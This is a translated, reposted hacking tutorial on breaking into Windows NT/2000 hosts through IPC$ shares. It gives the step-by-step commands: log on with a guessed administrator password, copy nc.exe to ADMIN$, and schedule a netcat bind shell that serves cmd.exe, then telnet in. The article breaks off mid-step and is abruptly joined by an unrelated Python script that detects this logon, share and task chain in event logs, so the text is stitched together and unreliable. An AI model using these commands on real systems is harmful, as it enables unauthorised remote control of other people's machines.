IPC intrusion: the complete guide

xiaoxiao2021-03-06  35

IPC intrusion: the complete guide, by Analysist (http://www.china4lert.org)

Declaration: there are actually already plenty of tutorials on the IPC vulnerability, but many of them are incomplete, so netizens still keep asking me questions about intrusion through IPC. That is the reason I wrote this article. If you feel this article is incomplete too, then go and find a better one, but I hope you will tell me your opinions and suggestions so that I can keep improving it. This article draws on Xiaoyu's Streamer 2000 documentation and other related documents, and it also contains some of my own experience. Non-commercial reprints are welcome, but please keep the article intact and indicate the source! :-)

IPC is an abbreviation of Internet Process Connection, a remote network connection. It is a feature specific to Windows NT and Windows 2000, and its characteristic is that only one connection is allowed between two IPs at a time. Ok, enough talk; now to the topic.

How do I find a host with the IPC vulnerability? I used to combine a foreign scanning tool (I have forgotten its name) with Killusa's Letmein; since a lot of the work had to be done by hand, you can imagine the speed. Now that Streamer 2000 is everywhere, finding such a host has become too simple; I will not go into it, you can refer to the software's documentation.

Ok, suppose we have found a host with the address 139.223.200.xxx, the administrator account is administrator, and the password is 123456. Switch to the command line and begin. Note that the steps below assume the target host has not disabled remote IPC$ connections and has the Schedule service started.

F:\>net use \\139.223.200.xxx\ipc$ "123456" /user:"administrator"
The command completed successfully.

F:\>copy nc.exe \\139.223.200.xxx\admin$
1 file(s) copied.

F:\>net time \\139.223.200.xxx
Current time at \\139.223.200.xxx is 2000/12/25 10:25 AM.
Local time (GMT-07:00) at \\139.223.200.xxx is 2000/12/25 10:35 AM.
The command completed successfully.

F:\>at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe
Added a new job with job ID = 0

F:\>telnet 139.223.200.xxx 1234

The commands above are very simple; you only need to look up the usage of net, at and nc. In this way we have logged on to the remote host. That is the ideal situation, but you may find that the Schedule service on the target host has not been started, in which case the at command cannot be used and we need to add the following step:

F:\>at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe
The service has not been started.

F:\>netsvc \\139.223.200.xxx schedule /start
Service is running on \\139.223.200.xxx

What can we do after getting onto the remote host? That depends on the permissions of this account and the security policy of the host. If your permissions are not enough, you can try the steps below. First, execute the following command locally.
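On the host side, the chain in this walkthrough (a network logon over IPC$, a file dropped through ADMIN$, then an AT job created from that same session) is exactly what an administrator would want to correlate in the Security log. The following is an added example, not part of the original article: it joins Security-log style records on the logon ID, assuming the modern Windows event IDs 4624 (network logon), 5140 (share access) and 4698 (scheduled task created), an assumed 15-minute window, and constructed sample records; it flags any administrative share (ADMIN$, C$), not only the ADMIN$ used above.

```python
from datetime import datetime, timedelta

# Constructed sample Security-log records (not real logs): (timestamp, event_id, fields).
# logon_id stands in for TargetLogonId (4624) / SubjectLogonId (5140, 4698).
SAMPLE_EVENTS = [
    ("2000-12-25 10:25:10", 4624, {"logon_id": "0x3e7a1", "logon_type": 3,
                                   "src_ip": "139.223.200.1", "user": "administrator"}),
    ("2000-12-25 10:25:30", 5140, {"logon_id": "0x3e7a1", "share": r"\\*\IPC$"}),
    ("2000-12-25 10:26:05", 5140, {"logon_id": "0x3e7a1", "share": r"\\*\ADMIN$"}),
    ("2000-12-25 10:27:40", 4698, {"logon_id": "0x3e7a1", "task": r"\At1",
                                   "command": "nc -l -p 1234 -t -e cmd.exe"}),
    # Benign: a network logon that only reads an ordinary share.
    ("2000-12-25 11:00:00", 4624, {"logon_id": "0x51b20", "logon_type": 3,
                                   "src_ip": "10.0.0.7", "user": "alice"}),
    ("2000-12-25 11:00:20", 5140, {"logon_id": "0x51b20", "share": r"\\*\Public"}),
    # Task created long after the session started: outside the window, ignored.
    ("2000-12-25 12:40:00", 4698, {"logon_id": "0x3e7a1", "task": r"\At2",
                                   "command": "backup.cmd"}),
]

WINDOW = timedelta(minutes=15)  # assumed: how long the whole chain may take

def share_name(unc):
    r"""Share part of a 5140 ShareName field, e.g. ADMIN$ from \\*\ADMIN$."""
    return unc.rsplit("\\", 1)[-1].upper()

def detect_ipc_chain(events, window=WINDOW):
    """Return one hit per logon session showing network logon -> administrative
    share access (ADMIN$, C$, ...) -> scheduled task creation within `window`."""
    sessions = {}  # logon_id -> state of that network session
    hits = []
    for ts_str, event_id, f in sorted(events, key=lambda e: e[0]):
        ts = datetime.strptime(ts_str, "%Y-%m-%d %H:%M:%S")
        lid = f["logon_id"]
        if event_id == 4624 and f.get("logon_type") == 3:
            sessions[lid] = {"start": ts, "src_ip": f["src_ip"], "user": f["user"],
                             "admin_share": False}
            continue
        s = sessions.get(lid)
        if s is None or ts - s["start"] > window:
            continue  # no matching network logon, or too long after it
        if event_id == 5140:
            name = share_name(f["share"])
            if name.endswith("$") and name != "IPC$":
                s["admin_share"] = True  # IPC$ alone is routine; ADMIN$/C$ is not
        elif event_id == 4698 and s["admin_share"]:
            hits.append({"logon_id": lid, "src_ip": s["src_ip"], "user": s["user"],
                         "task": f["task"], "command": f["command"]})
    return hits
```

On the sample records only the 139.223.200.1 session is reported; the benign logon and the out-of-window task are not.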

Please credit the original source when reposting: https://www.9cbs.com/read-66169.html
